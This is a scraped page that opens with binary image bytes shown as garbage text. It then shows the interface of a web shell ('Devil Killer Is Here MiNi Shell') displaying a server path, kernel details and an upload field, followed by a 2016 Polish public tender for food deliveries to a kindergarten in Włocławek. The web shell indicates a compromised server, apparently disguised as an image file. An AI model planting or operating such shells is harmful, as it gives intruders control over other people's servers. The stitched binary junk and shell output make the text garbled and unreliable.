JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160302/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160302/46542-N-2016.html

<p class="kh_header"><b>Włocławek: Dostawa artykułów spożywczych dla Przedszkola Akademickiego 
przy Państwowej Wyższej Szkole Zawodowej we Włocławku</b><br>
<b>Numer ogłoszenia: 46542 - 2016; data zamieszczenia: 02.03.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Państwowa Wyższa Szkoła Zawodowa we Włocławku , ul. 3 Maja 17, 87-800 Włocławek, woj. kujawsko-pomorskie, tel. 054 2316080, faks 054 2314352.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pwsz.wloclawek.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów spożywczych dla Przedszkola Akademickiego 
przy Państwowej Wyższej Szkole Zawodowej we Włocławku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia w przetargu nieograniczonym jest Dostawa artykułów spożywczych 
dla Przedszkola Akademickiego przy Państwowej Wyższej Szkole Zawodowej we Włocławku.

Zamówienie będzie realizowane według aktualnych potrzeb żywieniowych Zamawiającego, 
zaś podane ilości zamawianych artykułów spożywczych są ilościami szacunkowymi.

I.	Wymagania szczegółowe:
1.	Wykonanie umowy obejmuje sukcesywne dostawy poszczególnych artykułów spożywczych 
w oparciu o złożone przez Zamawiającego zamówienie, w którym określi on termin oraz asortyment zamówienia.
2.	Wszelkie koszty w tym: transportu, opakowania i ubezpieczenia na czas przewozu ponosi Dostawca, a Zamawiający zapewni odbiór produktów w siedzibie Zamawiającego. 
3.	Dostarczane artykuły spożywcze muszą spełniać wymagania jakościowe, dotyczące przechowywania, pakowania i transportu zawarte w Polskich Normach, posiadać właściwe atesty, certyfikaty oraz posiadać ważne terminy przydatności do spożycia. 
4.	Transport do siedziby zamawiającego powinien być realizowany środkami transportowymi dostosowanymi do przewozu artykułów spożywczych w warunkach zapewniających utrzymanie najwyższej jakości. 
5.	Dostawca zagwarantuje Zamawiającemu, że dostarczone produkty będą odpowiadały przepisom ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia ze szczególnym uwzględnieniem DZIAŁU IIA: Środki spożywcze oraz żywienie dzieci i młodzieży w jednostkach systemu oświaty oraz rozporządzenia Ministra Zdrowia z dnia 26 sierpnia 2015 r. w sprawie grup środków spożywczych przeznaczonych do sprzedaży dzieciom 
i młodzieży w jednostkach systemu oświaty oraz wymagań, jaki muszą spełniać środki spożywcze w ramach żywienia zbiorowego dzieci i młodzieży w tych jednostkach

II.	Termin wykonania zamówienia: od dnia 1 kwietnia 2016 r. do dnia 30 września 2016  r. 

III.	Dostawa artykułów spożywczych odbywać się będzie do obiektu Przedszkola Akademickiego przy ul. 3 Maja 17 w godz. zgodnie z terminami wskazanymi poniżej dla każdej części zamówienia.

IV.	Specyfikacja przedmiotu zamówienia: 

Część I Zamówienia - Nabiał

Dostawa - trzy razy w tygodniu, w godz. 6.00 - 7.00 lub wg potrzeb Zamawiającego

L.p.	Nazwa towaru	Jednostka miary	Ilość
1.	jogurt naturalny (kubek 150 g)	szt.	2 048
2.	kefir (kubek 400 g)	szt.	160
3.	masło bez dodatków roślinnych i konserwantów o zaw. tłuszczu 82% tłuszczu mlecznego (200 g)	szt.	600
4.	maślanka (karton 1l)	szt.	35
5.	mleko świeże 1,5 % (karton 1l)	szt.	300
6.	mleko świeże 2 % (karton 1l)	szt.	300
7.	ser żółty twardy, bez dodatku oleju roślinnego, mleka w proszku, skrobi i sztucznych barwników	kg	30
8.	serek ziarnisty (kubek 500 g)	szt.	160
9.	ser twarogowy, chudy	kg	60
10.	ser twarogowy, półtłusty	kg	120
11.	śmietana 18 %  (kubek 200 g)	szt.	16
12.	śmietana 30 %  (kubek 250 g)	szt.	13

Informacje dodatkowe:
1.	Mleko bez dodatku cukru i substancji słodzących zdefiniowanych w rozporządzeniu.
2.	Produkty mleczne: jogurt, kefir, maślanka, ser twarogowy, serek homogenizowany:
a)	zawierające nie więcej niż 10 g cukrów w 100 g/ml produktu gotowego do spożycia;
b)	bez dodatku substancji słodzących; 
c)	zawierające nie więcej niż 10 g tłuszczu w 100 g/ml produktu gotowego do spożycia.

Część II Zamówienia - Pieczywo

Dostawa - codziennie w godz. 6.00 - 6.30 lub wg potrzeb Zamawiającego

L.p.	Nazwa towaru	Jednostka miary	Ilość
1.	babeczka krucha (60 g)	szt.	70
2.	bułka graham (90 g)	szt.	640
3.	bułka maślana (90 g)	szt.	20
4.	bułka poznańska (90 g)	szt.	95
5.	bułka sojowa (60 g)	szt.	260
6.	bułka tarta (500 g)	szt.	40
7.	bułka wrocławska krojona (400 g)	szt.	7
8.	chałka (300 g)	szt.	40
9.	chleb graham (500 g)	szt.	590
10.	chleb razowy krojony (500 g)	szt.	105
11.	drożdżówka (120 g)	szt.	125
12.	żurek (0,5 l)	szt.	88


Część III Zamówienia - Ryby i mrożonki

Dostawa - co najmniej dwa razy w tygodniu, w godz. 7.00 - 10.00 lub wg potrzeb Zamawiającego

L.p.	Nazwa towaru	Jednostka miary	Ilość
1.	filet z mintaja b/s	kg	200
2.	filet z soli	kg	200
3.	fasola szparagowa mrożona	kg	20
4.	groszek mrożony	kg	20
5.	jagoda mrożona	kg	15
6.	mieszanka warzywna 7-składnikowa	kg	20
7.	truskawka mrożona	kg	15
8.	wiśnia mrożona bez pestki	kg	10
9.	barszcz ukraiński	kg	15
10.	marchew z groszkiem	kg	10
11.	mieszanka kompotowa 5-składnikowa	kg	15


Część IV Zamówienia - Mięso i przetwory mięsne

Dostawa - trzy razy w tygodniu, w godz. 6.00 - 7.00 lub wg potrzeb Zamawiającego

L.p.	Nazwa towaru	Jednostka miary	Ilość
1.	boczek surowy wędzony, parzony, bez żeberek, chudy	kg	5
2.	łopatka cielęca b/k	kg	35
3.	filet z indyka kl. I	kg	100
4.	filet z kurczaka kl. I	kg	330
5.	kiełbasa biała szynkowa wieprzowa	kg	25
6.	kiełbaska drobiowa w osłonce naturalnej, cienka (parówki), minimum 70-80% mięsa	kg	35
7.	kiełbasa zwyczajna, min. 70 % mięsa wieprzowego, b/MOM	kg	15
8.	królik świeży, tuszka	kg	30
9.	łopatka wieprzowa b/k, słonina całkowicie zdjęta, extra	kg	35
10.	noga z kurczaka świeża (pałka) 	kg	140
12.	polędwica sopocka drobiowa, min. 70 % mięsa, b/MOM	kg	15
13.	polędwica sopocka wieprzowa, wędzona, parzona, 80% mięsa wieprzowego	kg	15
14.	porcje rosołowe z kurczaka, świeże, duże	kg	80
15.	schab wieprzowy b/k, słonina całkowicie zdjęta, świeży	kg	40
16.	skrzydła z kurczaka świeże	kg	20
17.	słonina wieprzowa	kg	2
18.	szynka wieprzowa, wędzona, parzona, min. 80% mięsa wieprzowego	kg	15
19.	szynka z indyka, min. 80% mięsa indyczego, b/MOM	kg	55
20.	szynka z kurczaka, min. 80% mięsa drobiowego, b/MOM	kg	35
22.	łopatka wołowa b/k 	kg	15
23.	mięso mielone z indyka świeże	kg	30


Część V Zamówienia - Owoce, warzywa i jaja

Dostawa - trzy razy w tygodniu, w godz. 7.00 - 9.00 lub wg potrzeb Zamawiającego

L.p.	Nazwa towaru	Jednostka miary	Ilość
1.	agrest	kg	50
2.	arbuz	kg	30
3.	banany	kg	250
4.	bazylia świeża	szt.	6
5.	borówka (opakowanie 250 g)	op.	6
6.	brokuł	kg	100
7.	brzoskwinia	kg	100
8.	buraki czerwone 	kg	150
9.	buraki czerwone młode	kg	50
10.	cebula	kg	200
11.	cebula czerwona	kg	15
12.	cukinia	kg	150
13.	cytryna	kg	45
14.	czereśnie	kg	75
15.	czosnek polski (główka)	kg	30
16.	dynia	kg	60
17.	fasola szparagowa zielona	kg	20
18.	fasola szparagowa żółta	kg	20
19.	grejpfrut	kg	5
20.	gruszka	kg	200
21.	jabłka	kg	400
22.	jaja (opakowanie 30 szt.)	op.	170
23.	jagody	kg	10
24.	kalafior	kg	150
25.	kapusta biała	kg	80
26.	kapusta czerwona	kg	10
27.	kapusta kiszona	kg	30
28.	kapusta młoda	kg	80
29.	kapusta pekińska	kg	30
30.	kapusta włoska	kg	10
31.	kiwi	kg	180
32.	koper (pęczek 25 g)	szt.	1 000
33.	malina	kg	5
34.	mandarynka	kg	25
35.	marchew	kg	200
36.	marchew młoda	kg	200
37.	morela	kg	50
38.	natka pietruszki (pęczek 25 g)	szt.	1 000
39.	nektaryna	kg	40
40.	ogórek	kg	250
41.	ogórek kiszony	kg	150
42.	ogórek małosolny	kg	15
43.	papryka czerwona	kg	150
44.	papryka zielona	kg	30
45.	papryka żółta	kg	30
46.	pieczarka surowa	kg	120
47.	pietruszka korzeń	kg	230
48.	pomarańcze	kg	50
49.	pomidor	kg	750
50.	pomidor koktajlowy	kg	10
51.	por	kg	100
52.	porzeczka czerwona	kg	5
53.	rukola	op.	4
54.	rzodkiew biała	kg	10
55.	rzodkiewka (30 g pęczek)	szt.	500
56.	sałata	szt.	220
57.	sałata lodowa	szt.	50
58.	seler korzeń	kg	230
59.	seler naciowy	kg	25
60.	soja kiełki	kg	1
61.	szczypior (pęczek 25 g)	szt.	1 000
62.	szpinak świeży	kg	5
63.	śliwka	kg	50
64.	truskawka	kg	300
65.	winogrono	kg	20
66.	wiśnie	kg	75
67.	ziemniaki	kg	800
68.	ziemniaki młode	kg	600


Część VI Zamówienia - pozostałe artykuły spożywcze

Dostawa - raz w tygodniu, w godz. 7.00 - 14.00 lub wg potrzeb Zamawiającego

L.p.	Nazwa towaru	Jednostka miary	Ilość
1.	biszkopty (opakowanie 250 g)	szt.	10
2.	budyń proszek (opakowanie 60 g)	szt.	70
3.	ciastka owsiane typu sasanki (opakowanie 200 g)	szt.	50
4.	cukier kryształ (1 kg)	kg	30
5.	cukier puder (opakowanie 0,5 kg)	szt.	2
6.	cukier wanilinowy (opakowanie 16 g)	szt.	65
7.	czekoladowe płatki	szt.	4
8.	dekoracje cukrowe	szt.	5
9.	dżem niskosłodzony, różne smaki (słoik 260 g)	szt.	35
10.	fasola biała nasiona (opakowanie 0,5 kg)	szt.	10
11.	fasola konserwowa (opakowanie 400 g)	szt.	5
12.	fasolka konserwowa czerwona (opakowanie 400 g)	szt.	5
13.	galaretka owocowa (opakowanie 75 g)	szt.	20
14.	groszek konserwowy (puszka 200 g)	szt.	150
15.	herbata typu Saga (opakowanie 100 torebek)	szt.	20
16.	herbatka owocowa (opakowanie 100 torebek)	szt.	24
17.	herbatniki pełnoziarniste (opakowanie 350 g)	szt.	14
18.	kakao  (opakowanie 200 g)	szt.	50
19.	kasza gryczana (opakowanie 1 kg)	kg	6
20.	kasza jaglana (opakowanie 400 g)	szt.	90
21.	kasza jęczmienna (opakowanie 1 kg)	kg	55
22.	kasza kuskus (opakowanie 400 g)	szt.	20
23.	kasza pęczak (1 kg)	kg	6
24.	kawa zbożowa (opakowanie 500 g)	szt.	50
25.	ketchup łagodny, bez konserwantów wytworzony ze 120 g pomidorów do przygotowania 100 g produktu gotowego (opakowanie 500 g)	szt.	10
26.	kisiel, bez sztucznych barwników(opakowanie 60 g)	szt.	140
27.	koncentrat pomidorowy bez konserwantów 30% (opakowanie 500 g)	kg	100
28.	kukurydza w puszce (puszka 250 g)	szt.	10
29.	makaron (opakowanie 500 g - świderki, kolanka, krajanka, spaghetti)	kg	30
30.	makaron razowy, pełnoziarnisty (opakowanie 500 g)	kg	35
31.	mąka pszenna pełnoziarnista (1 kg typ 650)	kg	75
32.	mąka ziemniaczana (opakowanie 500 g)	kg	15
33.	mąka żytnia (1 kg, typ 1400)	kg	5
34.	musztarda stołowa (słoik 180 g)	szt.	10
35.	olej rzepakowy 1 l	l	140
36.	oliwa z oliwek (butelka 750 ml)	szt.	40
37.	otręby owsiane (opakowanie 1 kg)	kg	3
38.	otręby pszenne (opakowanie 1 kg)	kg	13
39.	papryka czerwona konserwowa (opakowanie 340 g)	szt.	15
40.	pieczywo chrupkie (opakowanie 100 g)	szt.	50
41.	płatki kukurydziane (opakowanie 1 kg)	kg	15
42.	płatki owsiane (opakowanie 200 g)	szt.	10
43.	płatki pszenne (opakowanie 400 g)	szt.	38
44.	pomidory suszone (opakowanie 1 kg)	kg	1
45.	pomidory w puszce krojone (opakowanie 400 g)	szt.	50
46.	posypka do ciasta, kolorowa 50g	szt.	4
47.	proszek do pieczenia (opakowanie 30 g)	szt.	20
48.	ryż (opakowanie 1 kg)	kg	30
49.	ryż basmati (opakowanie 0,5 kg)	szt.	25
50.	ryż brązowy (opakowanie 0,5 kg)	szt.	100
51.	sałatka z selera (opakowanie 200 g)	szt.	25
52.	skrobia kukurydziana (opakowanie 200 g)	szt.	10
53.	skrobia ziemniaczana (opakowanie 500 g)	szt.	10
54.	soda oczyszczona (opakowanie 80 g)	szt.	3
55.	tuńczyk w wodzie (puszka 185 g)	szt.	85
56.	wafle ryżowe (opakowanie 130 g)	szt.	200
57.	woda mineralna (5 l)	szt.	600
58.	żelatyna (opakowanie 50 g)	szt.	125
59.	len mielony (opakowanie 200 g)	szt.	5
60.	len nasiona (opakowanie 30 g)	szt.	15
61.	migdały (opakowanie 200 g)	szt.	4
62.	orzechy laskowe (opakowanie 200 g)	szt.	20
63.	orzechy włoskie (opakowanie 1 kg)	kg	30
64.	pestki dyni (opakowanie 500 g)	szt.	50
65.	płatki migdałowe (opakowanie 200 g)	szt.	5
66.	rodzynki (opakowanie 100 g)	szt.	5
67.	sezam nasiona (opakowanie 500 g)	szt.	15
68.	siemię lniane (opakowanie 250 g)	szt.	15
69.	siemię lniane mielone (opakowanie 200 g)	szt.	6
70.	słonecznik (opakowanie 500 g)	szt.	30
71.	wiórki kokosowe (opakowanie 200 g)	szt.	40
72.	miód naturalny wielokwiatowy (wiaderko 1200 g)	szt.	30
73.	bazylia (opakowanie 10 g)	szt.	800
74.	curry (opakowanie 20 g)	szt.	20
75.	cynamon (opakowanie 15 g)	szt.	450
76.	gałka muszkatałowa (opakowanie 10 g)	szt.	50
77.	goździk (opakowanie 30 g)	szt.	5
78.	imbir (opakowanie 15 g)	szt.	25
79.	kardamon (opakowanie 7 g)	szt.	100
80.	kminek (opakowanie 20 g)	szt.	10
81.	kolendra mielona (opakowanie 15 g)	szt.	10
82.	liść laurowy (opakowanie 6 g)	szt.	800
83.	lubczyk (opakowanie 10 g)	szt.	100
84.	majeranek (opakowanie 8 g)	szt.	180
85.	ocet balsamiczny (opakowanie 250 ml)	szt.	6
86.	ocet jabłkowy (opakowanie 250 ml)	szt.	1
87.	ocet winny (opakowanie 250 ml)	szt.	4
88.	oregano (opakowanie 10 g)	szt.	180
89.	papryka mielona ostra (opakowanie 20 g)	szt.	5
90.	papryka mielona słodka (opakowanie 20 g)	szt.	300
91.	pieprz biały mielony (opakowanie 15 g)	szt.	120
92.	pieprz czarny mielony (opakowanie 20 g)	szt.	600
93.	pieprz czarny ziarenka (opakowanie 55 g)	szt.	200
94.	pieprz kolorowy (opakowanie 15 g)	szt.	30
95.	pieprz ziołowy (opakowanie 20 g)	szt.	10
96.	rozmaryn (opakowanie 15 g)	szt.	50
97.	sól sodowo-potasowa(opakowanie 1 kg)	kg	40
98.	tymianek (opakowanie 10 g)	szt.	400
99.	wanilia (opakowanie 2,5 g)	szt.	75
100.	ziele angielskie (opakowanie 15 g)	szt.	400
101.	zioła prowansalskie (opakowanie 10 g)	szt.	300

Informacje dodatkowe:
1.	Zbożowe produkty śniadaniowe i inne produkty zbożowe:
a)	bez dodatku cukrów i substancji słodzących,
b)	o niskiej zawartości soli/sodu (zawierającej nie więcej niż 0,12 g sodu lub równoważnej ilości soli na 100 g lub 100 ml środka spożywczego.
2.	Przeciery warzywne, owocowo-warzywne:
a)	bez dodatków cukrów i substancji słodzących,
b)	bez dodatku soli.
3.	Naturalna woda mineralna nisko lub średniozmineralizowana, woda źródlana, woda stołowa w opakowaniach jednostkowych.
4.	Zioła i przyprawy suszone bez dodatku soli..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9, 15.20.00.00-0, 15.30.00.00-1, 15.40.00.00-2, 15.50.00.00-3, 15.60.00.00-4, 15.80.00.00-6, 15.90.00.00-7, 03.14.25.00-3, 03.14.21.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przwiduje złożenia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony przez Wykonawcę, jeżeli Wykonawca prowadzi działalność gospodarczą w zakresie objętym niniejszym Zamówieniem i złoży oświadczenie (zał. Nr 4 do SIWZ) o spełnieniu warunków udziału w postępowaniu. Zamawiający dokona oceny spełnienia warunków wg formuły spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony przez Wykonawcę, jeżeli Wykonawca prowadzi działalność gospodarczą w zakresie objętym niniejszym Zamówieniem i złoży oświadczenie (zał. Nr 4 do SIWZ) o spełnieniu warunków udziału w postępowaniu. Zamawiający dokona oceny spełnienia warunków wg formuły spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony przez Wykonawcę, jeżeli Wykonawca prowadzi działalność gospodarczą w zakresie objętym niniejszym Zamówieniem i złoży oświadczenie (zał. Nr 4 do SIWZ) o spełnieniu warunków udziału w postępowaniu. Zamawiający dokona oceny spełnienia warunków wg formuły spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony przez Wykonawcę, jeżeli Wykonawca prowadzi działalność gospodarczą w zakresie objętym niniejszym Zamówieniem i złoży oświadczenie (zał. Nr 4 do SIWZ) o spełnieniu warunków udziału w postępowaniu. Zamawiający dokona oceny spełnienia warunków wg formuły spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony przez Wykonawcę, jeżeli Wykonawca prowadzi działalność gospodarczą w zakresie objętym niniejszym Zamówieniem i złoży oświadczenie (zał. Nr 4 do SIWZ) o spełnieniu warunków udziału w postępowaniu. Zamawiający dokona oceny spełnienia warunków wg formuły spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Zaświadczenie o wpisie do rejestru zakładów podlegających urzędowej kontroli organów Państwowej Inspekcji Sanitarnej na podstawie ustawy z dnia 25 sierpnia 2006 r. 
o bezpieczeństwie żywności i żywienia</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin płatności - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
